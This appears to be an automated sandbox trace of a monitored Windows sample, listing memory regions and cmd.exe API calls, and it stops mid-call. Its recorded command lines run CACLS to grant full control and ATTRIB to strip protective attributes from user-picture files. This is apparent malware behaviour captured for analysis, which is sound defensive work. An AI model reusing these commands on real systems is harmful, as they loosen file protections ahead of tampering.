start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26061 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 26062 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 26063 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26064 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26065 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26066 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26067 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26068 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26069 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007f6f0000" filename = "" Thread: id = 515 os_tid = 0x7d4 Thread: id = 516 os_tid = 0x8ac Process: id = "360" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0x448" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "358" os_parent_pid = "0xe50" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26070 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26071 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26072 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26073 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 26074 start_va = 0xc90000 end_va = 0xc96fff entry_point = 0xc90000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26075 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") 
Region: id = 26076 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26077 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26078 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26079 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26080 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26081 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26082 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26083 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 26084 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 26085 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26086 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 
26087 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26088 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26089 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26090 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26091 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26092 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26093 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26094 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26095 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: 
"c:\\windows\\system32\\gdi32.dll") Region: id = 26096 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26097 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26098 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26099 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 517 os_tid = 0x608 Process: id = "361" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0x5d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26100 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26101 
start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26102 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26103 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 26104 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26105 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26106 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26107 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26108 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 26109 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26110 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26111 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26112 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000080000" filename = "" Region: id = 26113 start_va = 0x2d0000 end_va = 0x336fff entry_point = 0x2d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26114 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 26115 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26116 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26117 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26118 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26119 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26120 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26121 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 
"c:\\windows\\system32\\usp10.dll") Region: id = 26122 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26123 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26124 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 26125 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26126 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26127 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 26128 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 26129 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 26130 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 26131 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 26132 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 26133 start_va = 0x11b0000 end_va = 0x1312fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 26134 start_va = 0x1320000 end_va = 0x15eefff entry_point = 0x1320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 518 os_tid = 0xf6c [0183.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfe6c | out: lpSystemTimeAsFileTime=0x2cfe6c*(dwLowDateTime=0xa28cc460, dwHighDateTime=0x1d440a9)) [0183.953] GetCurrentProcessId () returned 0x5d0 [0183.953] GetCurrentThreadId () returned 0xf6c [0183.953] GetTickCount () returned 0x34a86 [0183.953] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfe64 | out: lpPerformanceCount=0x2cfe64*=24074203274) returned 1 [0183.953] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0183.953] __set_app_type (_Type=0x1) [0183.953] __p__fmode () returned 0x76b331f4 [0183.953] __p__commode () returned 0x76b331fc [0183.954] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0183.954] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0183.954] GetCurrentThreadId () returned 0xf6c [0183.954] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf6c) returned 0x38 [0183.954] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0183.954] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0183.954] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.954] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0183.954] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfdfc | out: 
phkResult=0x2cfdfc*=0x0) returned 0x2 [0183.954] VirtualQuery (in: lpAddress=0x2cfe33, lpBuffer=0x2cfdcc, dwLength=0x1c | out: lpBuffer=0x2cfdcc*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0183.954] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfdcc, dwLength=0x1c | out: lpBuffer=0x2cfdcc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0183.954] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfdcc, dwLength=0x1c | out: lpBuffer=0x2cfdcc*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0183.954] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfdcc, dwLength=0x1c | out: lpBuffer=0x2cfdcc*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0183.954] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfdcc, dwLength=0x1c | out: lpBuffer=0x2cfdcc*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0183.954] GetConsoleOutputCP () returned 0x1b5 [0183.954] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.955] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0183.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.955] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0183.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.955] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0183.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.955] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0183.955] _get_osfhandle (_FileHandle=0) returned 
0x3 [0183.955] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0183.955] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.955] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0183.955] GetEnvironmentStringsW () returned 0x90308* [0183.956] FreeEnvironmentStringsW (penv=0x90308) returned 1 [0183.956] GetEnvironmentStringsW () returned 0x90308* [0183.956] FreeEnvironmentStringsW (penv=0x90308) returned 1 [0183.956] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ced6c | out: phkResult=0x2ced6c*=0x40) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x0, lpData=0x2ced78*=0xb8, lpcbData=0x2ced70*=0x1000) returned 0x2 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x1, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x0, lpData=0x2ced78*=0x1, lpcbData=0x2ced70*=0x1000) returned 0x2 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x0, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x40, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, 
lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x40, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x0, lpData=0x2ced78*=0x40, lpcbData=0x2ced70*=0x1000) returned 0x2 [0183.956] RegCloseKey (hKey=0x40) returned 0x0 [0183.956] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ced6c | out: phkResult=0x2ced6c*=0x40) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x0, lpData=0x2ced78*=0x40, lpcbData=0x2ced70*=0x1000) returned 0x2 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x1, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x0, lpData=0x2ced78*=0x1, lpcbData=0x2ced70*=0x1000) returned 0x2 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x0, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, lpData=0x2ced78*=0x9, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x4, 
lpData=0x2ced78*=0x9, lpcbData=0x2ced70*=0x4) returned 0x0 [0183.956] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ced74, lpData=0x2ced78, lpcbData=0x2ced70*=0x1000 | out: lpType=0x2ced74*=0x0, lpData=0x2ced78*=0x9, lpcbData=0x2ced70*=0x1000) returned 0x2 [0183.956] RegCloseKey (hKey=0x40) returned 0x0 [0183.956] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886392 [0183.956] srand (_Seed=0x5b886392) [0183.956] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"" [0183.957] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"" [0183.957] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.957] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x91a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0183.957] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.957] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.957] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.957] _wcsicmp (_String1="PROMPT", _String2="CD") returned 
13 [0183.957] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0183.957] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0183.957] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0183.957] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0183.957] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0183.957] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0183.957] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0183.957] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0183.957] GetEnvironmentStringsW () returned 0x92458* [0183.958] FreeEnvironmentStringsW (penv=0x92458) returned 1 [0183.958] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.958] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.958] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0183.958] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0183.958] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0183.958] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0183.958] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0183.958] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0183.958] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0183.958] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0183.958] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfb38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.958] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfb38, 